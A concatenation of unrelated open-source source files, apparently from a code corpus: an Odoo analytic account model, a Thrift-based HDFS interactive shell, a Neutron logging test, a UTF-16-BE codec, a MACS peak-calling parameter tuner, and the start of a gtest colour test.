cr.execute("""update account_analytic_account set currency_id=%s where id=%s""", (value, account.id))
self.invalidate_cache(cr, uid, ['currency_id'], [account.id], context=context)
def _currency(self, cr, uid, ids, field_name, arg, context=None):
result = {}
for rec in self.browse(cr, uid, ids, context=context):
if rec.company_id:
result[rec.id] = rec.company_id.currency_id.id
else:
result[rec.id] = rec.currency_id.id
return result
_columns = {
'name': fields.char('Account/Contract Name', required=True, track_visibility='onchange'),
'complete_name': fields.function(_get_full_name, type='char', string='Full Name'),
'code': fields.char('Reference', select=True, track_visibility='onchange', copy=False),
'type': fields.selection([('view','Analytic View'), ('normal','Analytic Account'),('contract','Contract or Project'),('template','Template of Contract')], 'Type of Account', required=True,
help="If you select the View Type, it means you won\'t allow to create journal entries using that account.\n"\
"The type 'Analytic account' stands for usual accounts that you only want to use in accounting.\n"\
"If you select Contract or Project, it offers you the possibility to manage the validity and the invoicing options for this account.\n"\
"The special type 'Template of Contract' allows you to define a template with default data that you can reuse easily."),
'template_id': fields.many2one('account.analytic.account', 'Template of Contract'),
'description': fields.text('Description'),
'parent_id': fields.many2one('account.analytic.account', 'Parent Analytic Account', select=2),
'child_ids': fields.one2many('account.analytic.account', 'parent_id', 'Child Accounts'),
'child_complete_ids': fields.function(_child_compute, relation='account.analytic.account', string="Account Hierarchy", type='many2many'),
'line_ids': fields.one2many('account.analytic.line', 'account_id', 'Analytic Entries'),
'balance': fields.function(_debit_credit_bal_qtty, type='float', string='Balance', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'debit': fields.function(_debit_credit_bal_qtty, type='float', string='Debit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'credit': fields.function(_debit_credit_bal_qtty, type='float', string='Credit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'quantity': fields.function(_debit_credit_bal_qtty, type='float', string='Quantity', multi='debit_credit_bal_qtty'),
'quantity_max': fields.float('Prepaid Service Units', help='Sets the higher limit of time to work on the contract, based on the timesheet. (for instance, number of hours in a limited support contract.)'),
'partner_id': fields.many2one('res.partner', 'Customer'),
'user_id': fields.many2one('res.users', 'Project Manager', track_visibility='onchange'),
'manager_id': fields.many2one('res.users', 'Account Manager', track_visibility='onchange'),
'date_start': fields.date('Start Date'),
'date': fields.date('Expiration Date', select=True, track_visibility='onchange'),
'company_id': fields.many2one('res.company', 'Company', required=False), #not required because we want to allow different companies to use the same chart of account, except for leaf accounts.
'state': fields.selection([('template', 'Template'),
('draft','New'),
('open','In Progress'),
('pending','To Renew'),
('close','Closed'),
('cancelled', 'Cancelled')],
'Status', required=True,
track_visibility='onchange', copy=False),
'currency_id': fields.function(_currency, fnct_inv=_set_company_currency, #the currency_id field is readonly except if it's a view account and if there is no company
store = {
'res.company': (_get_analytic_account, ['currency_id'], 10),
}, string='Currency', type='many2one', relation='res.currency'),
}
def on_change_template(self, cr, uid, ids, template_id, date_start=False, context=None):
if not template_id:
return {}
res = {'value':{}}
template = self.browse(cr, uid, template_id, context=context)
if template.date_start and template.date:
from_dt = datetime.strptime(template.date_start, tools.DEFAULT_SERVER_DATE_FORMAT)
to_dt = datetime.strptime(template.date, tools.DEFAULT_SERVER_DATE_FORMAT)
timedelta = to_dt - from_dt
res['value']['date'] = datetime.strftime(datetime.now() + timedelta, tools.DEFAULT_SERVER_DATE_FORMAT)
if not date_start:
res['value']['date_start'] = fields.date.today()
res['value']['quantity_max'] = template.quantity_max
res['value']['parent_id'] = template.parent_id and template.parent_id.id or False
res['value']['description'] = template.description
return res
def on_change_partner_id(self, cr, uid, ids,partner_id, name, context=None):
res={}
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
if partner.user_id:
res['manager_id'] = partner.user_id.id
if not name:
res['name'] = _('Contract: ') + partner.name
return {'value': res}
def _default_company(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if user.company_id:
return user.company_id.id
return self.pool.get('res.company').search(cr, uid, [('parent_id', '=', False)])[0]
def _get_default_currency(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.currency_id.id
_defaults = {
'type': 'normal',
'company_id': _default_company,
'code' : lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.analytic.account'),
'state': 'open',
'user_id': lambda self, cr, uid, ctx: uid,
'partner_id': lambda self, cr, uid, ctx: ctx.get('partner_id', False),
'date_start': lambda *a: time.strftime('%Y-%m-%d'),
'currency_id': _get_default_currency,
}
def check_recursion(self, cr, uid, ids, context=None, parent=None):
return super(account_analytic_account, self)._check_recursion(cr, uid, ids, context=context, parent=parent)
_order = 'code, name asc'
_constraints = [
(check_recursion, 'Error! You cannot create recursive analytic accounts.', ['parent_id']),
]
def name_create(self, cr, uid, name, context=None):
raise osv.except_osv(_('Warning'), _("Quick account creation disallowed."))
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
analytic = self.browse(cr, uid, id, context=context)
default['name'] = _("%s (copy)") % analytic['name']
return super(account_analytic_account, self).copy(cr, uid, id, default, context=context)
def on_change_company(self, cr, uid, id, company_id):
if not company_id:
return {}
currency = self.pool.get('res.company').read(cr, uid, [company_id], ['currency_id'])[0]['currency_id']
return {'value': {'currency_id': currency}}
def on_change_parent(self, cr, uid, id, parent_id):
if not parent_id:
return {}
parent = self.read(cr, uid, [parent_id], ['partner_id','code'])[0]
if parent['partner_id']:
partner = parent['partner_id'][0]
else:
partner = False
res = {'value': {}}
if partner:
res['value']['partner_id'] = partner
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args=[]
if context is None:
context={}
if name:
account_ids = self.search(cr, uid, [('code', '=', name)] + args, limit=limit, context=context)
if not account_ids:
dom = []
for name2 in name.split('/'):
name = name2.strip()
account_ids = self.search(cr, uid, dom + [('name', 'ilike', name)] + args, limit=limit, context=context)
if not account_ids: break
dom = [('parent_id','in',account_ids)]
else:
account_ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, account_ids, context=context)
class account_analytic_line(osv.osv):
_name = 'account.analytic.line'
_description = 'Analytic Line'
_columns = {
'name': fields.char('Description', required=True),
'date': fields.date('Date', required=True, select=True),
'amount': fields.float('Amount', required=True, help='Calculated by multiplying the quantity and the price given in the Product\'s cost price. Always expressed in the company main currency.', digits_compute=dp.get_precision('Account')),
'unit_amount': fields.float('Quantity', help='Specifies the amount of quantity to count.'),
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', required=True, ondelete='restrict', select=True, domain=[('type','<>','view')]),
'user_id': fields.many2one('res.users', 'User'),
'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
def _get_default_date(self, cr, uid, context=None):
return fields.date.context_today(self, cr, uid, context=context)
def __get_default_date(self, cr, uid, context=None):
return self._get_default_date(cr, uid, context=context)
_defaults = {
'date': __get_default_date,
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.analytic.line', context=c),
'amount': 0.00
}
_order = 'date desc'
def _check_no_view(self, cr, uid, ids, context=None):
analytic_lines = self.browse(cr, uid, ids, context=context)
for line in analytic_lines:
if line.account_id.type == 'view':
return False
return True
_constraints = [
(_check_no_view, 'You cannot create analytic line on view account.', ['account_id']),
]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
liangly/hadoop-common | src/contrib/thriftfs/scripts/hdfs.py | 116 | 14991 | #!/usr/bin/env python
"""
hdfs.py is a python client for the thrift interface to HDFS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied. See the License for the specific language governing permissions
and limitations under the License.
"""
import sys
sys.path.append('../gen-py')
from optparse import OptionParser
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from hadoopfs import ThriftHadoopFileSystem
from hadoopfs.ttypes import *
from readline import *
from cmd import *
import os
import re
import readline
import subprocess
#
# The address of the FileSystemClientProxy. If the host and port are
# not specified, then a proxy server is automatically spawned.
#
host = 'localhost'
port = 4677 # use any port
proxyStartScript = './start_thrift_server.sh'
startServer = True # shall we start a proxy server?
#
# The hdfs interactive shell. The Cmd class is a builtin that uses readline + implements
# a whole bunch of utility stuff like help and custom tab completions.
# It makes everything real easy.
#
class hadoopthrift_cli(Cmd):
# my custom prompt looks better than the default
prompt = 'hdfs>> '
#############################
# Class constructor
#############################
def __init__(self, server_name, server_port):
Cmd.__init__(self)
self.server_name = server_name
self.server_port = server_port
#############################
# Start the ClientProxy Server if we can find it.
# Read in its stdout to determine what port it is running on
#############################
def startProxyServer(self):
try:
      p = subprocess.Popen([proxyStartScript, str(self.server_port)], stdout=subprocess.PIPE)
content = p.stdout.readline()
p.stdout.close()
val = re.split( '\[|\]', content)
print val[1]
self.server_port = val[1]
return True
except Exception, ex:
print "ERROR in starting proxy server " + proxyStartScript
print '%s' % (ex.message)
return False
#############################
# Connect to clientproxy
#############################
def connect(self):
try:
# connect to hdfs thrift server
self.transport = TSocket.TSocket(self.server_name, self.server_port)
self.transport = TTransport.TBufferedTransport(self.transport)
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
# Create a client to use the protocol encoder
self.client = ThriftHadoopFileSystem.Client(self.protocol)
self.transport.open()
# tell the HadoopThrift server to die after 60 minutes of inactivity
self.client.setInactivityTimeoutPeriod(60*60)
return True
except Thrift.TException, tx:
print "ERROR in connecting to ", self.server_name, ":", self.server_port
print '%s' % (tx.message)
return False
#
# Disconnect from client proxy
#
def shutdown(self):
try :
self.transport.close()
except Exception, tx:
return False
#############################
# Create the specified file. Returns a handle to write data.
#############################
def do_create(self, name):
if name == "":
print " ERROR usage: create <pathname>"
print
return 0
# Create the file, and immediately closes the handle
path = Pathname();
path.pathname = name;
status = self.client.create(path)
self.client.close(status)
return 0
#############################
# Delete the specified file.
#############################
def do_rm(self, name):
if name == "":
print " ERROR usage: rm <pathname>\n"
return 0
# delete file
path = Pathname();
path.pathname = name;
status = self.client.rm(path, False)
if status == False:
print " ERROR in deleting path: " + name
return 0
#############################
# Rename the specified file/dir
#############################
def do_mv(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
src = params[0].strip()
dest = params[1].strip()
if src == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
if dest == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
# move file
path = Pathname();
path.pathname = src;
destpath = Pathname();
destpath.pathname = dest;
status = self.client.rename(path, destpath)
if status == False:
print " ERROR in renaming path: " + name
return 0
#############################
# Delete the specified file.
#############################
def do_mkdirs(self, name):
if name == "":
print " ERROR usage: mkdirs <pathname>\n"
return 0
# create directory
path = Pathname();
path.pathname = name;
fields = self.client.mkdirs(path)
return 0
#############################
# does the pathname exist?
#############################
def do_exists(self, name):
if name == "":
print " ERROR usage: exists <pathname>\n"
return 0
# check existence of pathname
path = Pathname();
path.pathname = name;
fields = self.client.exists(path)
if (fields == True):
print name + " exists."
else:
print name + " does not exist."
return 0
#############################
# copy local file into hdfs
#############################
def do_put(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
local = params[0].strip()
hdfs = params[1].strip()
if local == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
if hdfs == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
# open local file
input = open(local, 'rb')
# open output file
path = Pathname();
path.pathname = hdfs;
output = self.client.create(path)
# read 1MB at a time and upload to hdfs
while True:
chunk = input.read(1024*1024)
if not chunk: break
self.client.write(output, chunk)
self.client.close(output)
input.close()
#############################
# copy hdfs file into local
#############################
def do_get(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
hdfs = params[0].strip()
local = params[1].strip()
if local == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
if hdfs == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
# open output local file
output = open(local, 'wb')
# open input hdfs file
path = Pathname();
path.pathname = hdfs;
input = self.client.open(path)
# find size of hdfs file
filesize = self.client.stat(path).length
# read 1MB bytes at a time from hdfs
offset = 0
chunksize = 1024 * 1024
while True:
chunk = self.client.read(input, offset, chunksize)
if not chunk: break
output.write(chunk)
offset += chunksize
if (offset >= filesize): break
self.client.close(input)
output.close()
#############################
# List attributes of this path
#############################
def do_ls(self, name):
if name == "":
print " ERROR usage: list <pathname>\n"
return 0
# list file status
path = Pathname();
path.pathname = name;
status = self.client.stat(path)
if (status.isdir == False):
self.printStatus(status)
return 0
# This is a directory, fetch its contents
liststatus = self.client.listStatus(path)
for item in liststatus:
self.printStatus(item)
#############################
# Set permissions for a file
#############################
def do_chmod(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: chmod 774 <pathname>\n"
return 0
perm = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
if perm == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
# set permissions (in octal)
path = Pathname();
path.pathname = name;
status = self.client.chmod(path, int(perm,8))
return 0
#############################
# Set owner for a file. This is not an atomic operation.
# A change to the group of a file may be overwritten by this one.
#############################
def do_chown(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
owner = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
# get the current owner and group
path = Pathname();
path.pathname = name;
cur = self.client.stat(path)
# set new owner, keep old group
status = self.client.chown(path, owner, cur.group)
return 0
#######################################
# Set the replication factor for a file
######################################
def do_setreplication(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
repl = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
if repl == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
status = self.client.setReplication(path, int(repl))
return 0
#############################
# Display the locations of the blocks of this file
#############################
def do_getlocations(self, name):
if name == "":
print " ERROR usage: getlocations <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
# find size of hdfs file
filesize = self.client.stat(path).length
# getlocations file
blockLocations = self.client.getFileBlockLocations(path, 0, filesize)
for item in blockLocations:
self.printLocations(item)
return 0
#############################
# Utility methods from here
#############################
#
# If I don't do this, the last command is always re-executed which is annoying.
#
def emptyline(self):
pass
#
# print the status of a path
#
def printStatus(self, stat):
print str(stat.block_replication) + "\t" + str(stat.length) + "\t" + str(stat.modification_time) + "\t" + stat.permission + "\t" + stat.owner + "\t" + stat.group + "\t" + stat.path
#
# print the locations of a block
#
def printLocations(self, location):
print str(location.names) + "\t" + str(location.offset) + "\t" + str(location.length)
#
# Various ways to exit the hdfs shell
#
def do_quit(self,ignored):
try:
if startServer:
self.client.shutdown(1)
return -1
except Exception, ex:
return -1
def do_q(self,ignored):
return self.do_quit(ignored)
# ctl-d
def do_EOF(self,ignored):
return self.do_quit(ignored)
#
# Give the user some amount of help - I am a nice guy
#
def help_create(self):
print "create <pathname>"
def help_rm(self):
print "rm <pathname>"
def help_mv(self):
print "mv <srcpathname> <destpathname>"
def help_mkdirs(self):
print "mkdirs <pathname>"
def help_exists(self):
print "exists <pathname>"
def help_put(self):
print "put <localpathname> <hdfspathname>"
def help_get(self):
print "get <hdfspathname> <localpathname>"
def help_ls(self):
print "ls <hdfspathname>"
def help_chmod(self):
print "chmod 775 <hdfspathname>"
def help_chown(self):
print "chown <ownername> <hdfspathname>"
def help_setreplication(self):
print "setrep <replication factor> <hdfspathname>"
def help_getlocations(self):
print "getlocations <pathname>"
def help_EOF(self):
print '<ctl-d> will quit this program.'
def help_quit(self):
print 'if you need to know what quit does, you shouldn\'t be using a computer.'
def help_q(self):
print 'quit and if you need to know what quit does, you shouldn\'t be using a computer.'
def help_help(self):
print 'duh'
def usage(exec_name):
print "Usage: "
print " %s [proxyclientname [proxyclientport]]" % exec_name
print " %s -v" % exec_name
print " %s --help" % exec_name
print " %s -h" % exec_name
if __name__ == "__main__":
#
# Rudimentary command line processing.
#
# real parsing:
parser = OptionParser()
parser.add_option("-e", "--execute", dest="command_str",
help="execute this command and exit")
parser.add_option("-s","--proxyclient",dest="host",help="the proxyclient's hostname")
parser.add_option("-p","--port",dest="port",help="the proxyclient's port number")
(options, args) = parser.parse_args()
#
# Save host and port information of the proxy server
#
if (options.host):
host = options.host
startServer = False
if (options.port):
port = options.port
startServer = False
#
# Retrieve the user's readline history.
#
historyFileName = os.path.expanduser("~/.hdfs_history")
if (os.path.exists(historyFileName)):
readline.read_history_file(historyFileName)
#
# Create class and connect to proxy server
#
c = hadoopthrift_cli(host,port)
if startServer:
if c.startProxyServer() == False:
sys.exit(1)
if c.connect() == False:
sys.exit(1)
#
# If this utility was invoked with one argument, process it
#
if (options.command_str):
c.onecmd(options.command_str)
sys.exit(0)
#
# Start looping over user commands.
#
c.cmdloop('Welcome to the Thrift interactive shell for Hadoop File System. - how can I help you? ' + '\n'
'Press tab twice to see the list of commands. ' + '\n' +
'To complete the name of a command press tab once. \n'
)
c.shutdown();
readline.write_history_file(historyFileName)
print '' # I am nothing if not courteous.
sys.exit(0)
| apache-2.0 |
gopal1cloud/neutron | neutron/tests/unit/test_common_log.py | 22 | 2943 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.common import log as call_log
from neutron.tests import base
MODULE_NAME = 'neutron.tests.unit.test_common_log'
class TargetKlass(object):
@call_log.log
def test_method(self, arg1, arg2, *args, **kwargs):
pass
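# For reference, TargetKlass().test_method(10, arg2=20) is expected to emit
# a debug record rendered from the format string asserted below, with
# args=(10,) and kwargs={'arg2': 20}.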
class TestCallLog(base.BaseTestCase):
def setUp(self):
super(TestCallLog, self).setUp()
self.klass = TargetKlass()
self.expected_format = ('%(class_name)s method %(method_name)s '
'called with arguments %(args)s %(kwargs)s')
self.expected_data = {'class_name': MODULE_NAME + '.TargetKlass',
'method_name': 'test_method',
'args': (),
'kwargs': {}}
def test_call_log_all_args(self):
self.expected_data['args'] = (10, 20)
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_all_kwargs(self):
self.expected_data['kwargs'] = {'arg1': 10, 'arg2': 20}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(arg1=10, arg2=20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_unknown_args_kwargs(self):
self.expected_data['args'] = (10, 20, 30)
self.expected_data['kwargs'] = {'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20, 30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_kwargs_unknown_kwargs(self):
self.expected_data['args'] = (10,)
self.expected_data['kwargs'] = {'arg2': 20, 'arg3': 30, 'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, arg2=20, arg3=30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
| apache-2.0 |
lucafavatella/intellij-community | python/lib/Lib/encodings/utf_16_be.py | 860 | 1037 | """ Python 'utf-16-be' Codec
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
encode = codecs.utf_16_be_encode
def decode(input, errors='strict'):
return codecs.utf_16_be_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.utf_16_be_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
_buffer_decode = codecs.utf_16_be_decode
class StreamWriter(codecs.StreamWriter):
encode = codecs.utf_16_be_encode
class StreamReader(codecs.StreamReader):
decode = codecs.utf_16_be_decode
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-16-be',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
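# A minimal usage sketch via the codecs registry (the values shown are
# what Python 2 produces for this big-endian codec):
#
#   >>> import codecs
#   >>> codecs.encode(u'ab', 'utf-16-be')
#   '\x00a\x00b'
#   >>> codecs.decode('\x00a\x00b', 'utf-16-be')
#   u'ab'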
| apache-2.0 |
odb9402/OPPA | oppa/macs/archive.py | 1 | 5675 | """
this module actually fixes some parameters by using
bayesian optimization. if we run this function in parallel,
we need to satisfy many conditions mentioned in the paper
named 'Practical Bayesian Optimization of Machine Learning Algorithms'
"""
from math import exp
import subprocess
import time
from multiprocessing import cpu_count
from multiprocessing import Process
from ..optimizeHyper import run as optimizeHyper
from ..calculateError import run as calculateError
from ..loadParser.loadLabel import run as loadLabel
from ..loadParser.parseLabel import run as parseLabel
def learnMACSparam(args, test_set, validation_set, PATH):
"""
    this function actually controls the learning steps. args is given by
    oppa.py ( main function of this program ) from the command line,
    and wrapper functions are built for the BayesianOptimization library;
    only the wrapper functions' arguments will be learned by the library.
:param args:
argument from command lines
:param test_set:
python list of test set
:param validation_set:
python list of validation set
:return: learned parameter.
"""
input_file = args.input
control = args.control
call_type = args.callType
def wrapper_narrow_cut(opt_Qval):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control)
print "Qval :"+str(exp(opt_Qval/100)-1)
return correct
def wrapper_broad_cut(opt_Qval, opt_cutoff):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control, broad=str(exp(opt_cutoff/100)-1))
print "Qval :"+str(exp(opt_Qval/100)-1), "Broad-cutoff:"+str(exp(opt_cutoff/100)-1)
return correct
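    # the optimizer searches a transformed scale: a raw value x maps to a
    # MACS q-value of exp(x/100)-1, so the bounds below (10**-8 .. 60.0)
    # correspond to q-values from ~0 up to ~0.822.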
parameters_bounds_narrow = {'opt_Qval':(10**-8,60.0)}
parameters_bounds_broad = {'opt_Qval':(10**-8,60.0),\
'opt_cutoff':(10**-7,60.0)}
number_of_init_sample = 2
if call_type is None:
        result = optimizeHyper(wrapper_narrow_cut, parameters_bounds_narrow, number_of_init_sample)
        # map the learned value back from the optimizer's transformed scale
        best_Qval = str(exp(result['max_params']['opt_Qval']/100)-1)
        subprocess.call(['macs2','callpeak','-t',input_file,'-c',control,'-g','hs','-q',best_Qval])
        # evaluate the learned q-value on the held-out test set
        final_error = run(input_file, test_set, best_Qval, call_type, control)
        print " final error about test set is :::" + str(final_error)
else:
result = optimizeHyper(wrapper_broad_cut, parameters_bounds_broad, number_of_init_sample)
def run(input_file, valid_set, Qval, call_type, control = None, broad=None):
"""
    this function runs MACS and calculates the error at once.
    each argument will be given by learnMACSparam from the command line.
:param input_file:
input file name.
:param valid_set:
python list of labeled data
:param Qval:
Q-value of MACS. it will be learned.
:param control:
control bam file in MACS. not necessary.
:return:
error rate of between MACS_output and labeled Data.
"""
import MACS
chromosome_list = []
for label in valid_set:
chromosome_list.append(label.split(':')[0])
chromosome_list = list(set(chromosome_list))
reference_char = ".REF_"
bam_name = input_file[:-4] ## delete '.bam'
if control is not None:
cr_bam_name = control[:-4]
MAX_CORE = cpu_count()
TASKS = len(chromosome_list)
TASK_NO = 0
macs_processes = []
while (len(macs_processes) < MAX_CORE-1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
while len(macs_processes) > 0:
time.sleep(0.1)
for proc in reversed(range(len(macs_processes))):
if macs_processes[proc].poll() is not None:
del macs_processes[proc]
while (len(macs_processes) < MAX_CORE - 1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
#there must be valid validation set and test set.
if not valid_set:
print "there are no matched validation set :p\n"
exit()
#actual learning part
else:
error_num, label_num = summerize_error(bam_name, valid_set, call_type)
        if label_num == 0:
            return 1.0
        return (1 - float(error_num)/label_num) * 100
def summerize_error(bam_name, validation_set, call_type):
"""
    :param bam_name:
        prefix of the per-chromosome MACS output files
    :param validation_set:
        python list of labeled data
    :return:
        tuple of (total error count, total label count) over all chromosomes
"""
sum_error_num = 0
sum_label_num = 0
reference_char = ".REF_chr"
if call_type == "broad":
output_format_name = '.broadPeak'
else:
output_format_name = '.narrowPeak'
for chr_no in range(22):
input_name = bam_name + reference_char + str(chr_no+1) + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
# add about sexual chromosome
input_name = bam_name + reference_char + 'X' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
input_name = bam_name + reference_char + 'Y' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
return sum_error_num , sum_label_num
| mit |
charlescearl/VirtualMesos | third_party/libprocess/third_party/gmock-1.6.0/gtest/test/gtest_color_test.py | 3259 | 4911 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly determines whether to use colors."""
__author__ = '[email protected] (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name == 'nt'
COLOR_ENV_VAR = 'GTEST_COLOR'
COLOR_FLAG = 'gtest_color'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_color_test_')
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def UsesColor(term, color_env_var, color_flag):
"""Runs gtest_color_test_ and returns its exit code."""
SetEnvVar('TERM', term)
SetEnvVar(COLOR_ENV_VAR, color_env_var)
if color_flag is None:
args = []
else:
args = ['--%s=%s' % (COLOR_FLAG, color_flag)]
p = gtest_test_utils.Subprocess([COMMAND] + args)
return not p.exited or p.exit_code
class GTestColorTest(gtest_test_utils.TestCase):
def testNoEnvVarNoFlag(self):
"""Tests the case when there's neither GTEST_COLOR nor --gtest_color."""
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', None, None))
self.assert_(not UsesColor('emacs', None, None))
self.assert_(not UsesColor('xterm-mono', None, None))
self.assert_(not UsesColor('unknown', None, None))
self.assert_(not UsesColor(None, None, None))
self.assert_(UsesColor('linux', None, None))
self.assert_(UsesColor('cygwin', None, None))
self.assert_(UsesColor('xterm', None, None))
self.assert_(UsesColor('xterm-color', None, None))
self.assert_(UsesColor('xterm-256color', None, None))
def testFlagOnly(self):
"""Tests the case when there's --gtest_color but not GTEST_COLOR."""
self.assert_(not UsesColor('dumb', None, 'no'))
self.assert_(not UsesColor('xterm-color', None, 'no'))
if not IS_WINDOWS:
self.assert_(not UsesColor('emacs', None, 'auto'))
